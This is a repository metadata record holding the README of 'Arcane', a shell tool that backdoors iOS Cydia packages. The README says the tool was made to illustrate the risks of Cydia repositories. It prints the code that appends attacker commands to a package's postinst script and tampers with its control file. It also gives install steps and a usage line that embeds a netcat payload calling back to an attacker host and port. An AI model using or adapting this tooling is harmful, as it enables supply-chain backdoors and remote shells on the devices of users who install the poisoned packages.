{"id":17383092,"url":"https://github.com/tokyoneon/arcane","last_synced_at":"2025-08-19T05:07:07.437Z","repository":{"id":40342432,"uuid":"282133655","full_name":"tokyoneon/Arcane","owner":"tokyoneon","description":"Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories.","archived":false,"fork":false,"pushed_at":"2020-08-04T02:33:34.000Z","size":805,"stargazers_count":158,"open_issues_count":0,"forks_count":28,"subscribers_count":13,"default_branch":"master","last_synced_at":"2025-08-16T21:53:26.663Z","etag":null,"topics":["apt","arm","arm64","attack","backdoor","cydia","cydia-repo","debian-packages","information-security","ios","iphone","kali","kali-linux","kali-scripts","offensive-security","payload","penetration-testing","shell","shell-script","shell-scripts"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/tokyoneon.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-07-24T05:45:10.000Z","updated_at":"2025-07-15T09:49:28.000Z","dependencies_parsed_at":"2022-07-06T16:32:21.127Z","dependency_job_id":null,"html_url":"https://github.com/tokyoneon/Arcane","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/tokyoneon/Arcane","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane/releases","manifests_url":"ht
tps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/tokyoneon","download_url":"https://codeload.github.com/tokyoneon/Arcane/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/tokyoneon%2FArcane/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271103202,"owners_count":24699646,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["apt","arm","arm64","attack","backdoor","cydia","cydia-repo","debian-packages","information-security","ios","iphone","kali","kali-linux","kali-scripts","offensive-security","payload","penetration-testing","shell","shell-script","shell-scripts"],"created_at":"2024-10-16T07:40:34.343Z","updated_at":"2025-08-19T05:07:07.386Z","avatar_url":"https://github.com/tokyoneon.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"Arcane is a simple script designed to backdoor iOS packages (iphone-arm) and create the necessary resources for APT repositories. 
It was created for [this publication](https://null-byte.com/a-0325421/) to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.\n\n![](images/arcane.gif)\n\n---\n\n### How Arcane works...\n\nTo understand what's happening in the GIF, decompress a package created with Arcane.\n```\ndpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp\n```\n\nNotice the `control` and `postinst` files in the `DEBIAN` directory. Both files are important.\n```\ntree /tmp/whois-decomp/\n\n/tmp/whois-decomp/\n├── DEBIAN\n│   ├── control\n│   └── postinst\n└── usr\n    └── bin\n        └── whois\n```\n\nIt's possible to supply scripts as part of a package when installing or removing applications. [Package maintainer scripts](https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html) include the [preinst, postinst, prerm, and postrm](https://wiki.debian.org/MaintainerScripts) files. Arcane takes advantage of the `postinst` file to execute commands during the installation.\n```bash\n# The \"post-installation\" file. This file is generally responsible\n# for executing commands on the OS after installing the required\n# files. It's utilized by developers to manage and maintain various\n# aspects of an installation. 
Arcane abuses this functionality by\n# appending malicious Bash commands to the file.\npostinst=\"$tmp/DEBIAN/postinst\";\n\n# A function to handle the type of command execution embedded into the\n# postinst file.\nfunction inject_backdoor ()\n{\n    # If --file is used, `cat` the command(s) into the postinst file.\n    if [[ \"$infile\" ]]; then\n        cat \"$infile\" \u003e\u003e \"$postinst\";\n        embed=\"[$infile]\";\n    else\n        # If no --file, utilize the simple Bash payload, previously\n        # defined.\n        echo -e \"$payload\" \u003e\u003e \"$postinst\";\n        embed=\"generic shell command\";\n    fi;\n    status \"embedded $embed into postinst\" \"error embedding backdoor\";\n    chmod 0755 \"$postinst\"\n};\n```\n\nThe [control](https://www.debian.org/doc/debian-policy/ch-controlfields.html) file contains values that package management tools use when installing packages. Arcane will either modify an existing `control` or create it.\n```bash\n# The \"control\" file template. Most iOS packages will include a\n# control file. In the event one is not found, Arcane will use the\n# below template. The `$hacker` variable is used here to occupy\n# various arbitrary fields.\n# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html\ncontrolTemp=\"Package: com.$hacker.backdoor\nName: $hacker backdoor\nVersion: 1337\nSection: app\nArchitecture: iphoneos-arm\nDescription: A backdoored iOS package\nAuthor: $hacker \u003chttps://$hacker.github.io/\u003e\nMaintainer: $hacker \u003chttps://$hacker.github.io/\u003e\";\n\n...\n\n# An `if` statement to check for the control file.\nif [[ ! 
-f \"$tmp/DEBIAN/control\" ]]; then\n    # If no control is detected, create it using the template.\n    echo \"$controlTemp\" \u003e \"$tmp/DEBIAN/control\";\n    status \"created control file\" \"error with control template\";\nelse\n    # If a control file exists, Arcane will simply rename the package\n    # as it appears in the list of available Cydia applications. This\n    # makes the package easier to locate in Cydia.\n    msg \"detected control file\" succ;\n    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' \"$tmp/DEBIAN/control\";\n    status \"modified control file\" \"error with control\";\nfi;\n```\n\n### Usage\n\nClone the repository in Kali v2020.3.\n```\nsudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies\nsudo git clone https://github.com/tokyoneon/arcane /opt/arcane\nsudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane\nchmod +x arcane.sh;./arcane.sh --help\n```\n\nEmbed a command into a given package. See [article](https://null-byte.com/a-0325421/) for more info.\n```\n./arcane.sh --input samples/sed_4.5-1_iphoneos-arm.deb --lhost \u003cattacker\u003e --lport \u003c4444\u003e --cydia --netcat\n```\n\n### Package samples\n\nThe repo includes packages for testing.\n```\nls -la samples/\n\n-rw-r--r-- 1 root root 100748 Jul 17 18:39 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb\n-rw-r--r-- 1 root root 142520 Jul 22 06:21 network-cmds_543-1_iphoneos-arm.deb\n-rw-r--r-- 1 root root  76688 Aug 29  2018 sed_4.5-1_iphoneos-arm.deb\n-rw-r--r-- 1 root root  60866 Jul  8 21:03 top_39-2_iphoneos-arm.deb\n-rw-r--r-- 1 root root  13810 Aug 29  2018 whois_5.3.2-1_iphoneos-arm.deb\n```\n\nMD5 sums, as found on the official [Bingner repository](https://apt.bingner.com/).\n```\nmd5sum samples/*.deb\n\n3f1712964701580b3f018305a55e217c  samples/libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb\n795ccf9c6d53dd60d2f74f7a601f474f  samples/network-cmds_543-1_iphoneos-arm.deb\na020882dac121afa4b03c63304d729b0  
samples/sed_4.5-1_iphoneos-arm.deb\n38db275007a331e7ff8899ea22261dc7  samples/top_39-2_iphoneos-arm.deb\nb40ee800b72bbac323568b36ad67bb16  samples/whois_5.3.2-1_iphoneos-arm.deb\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftokyoneon%2Farcane","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftokyoneon%2Farcane","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftokyoneon%2Farcane/lists"}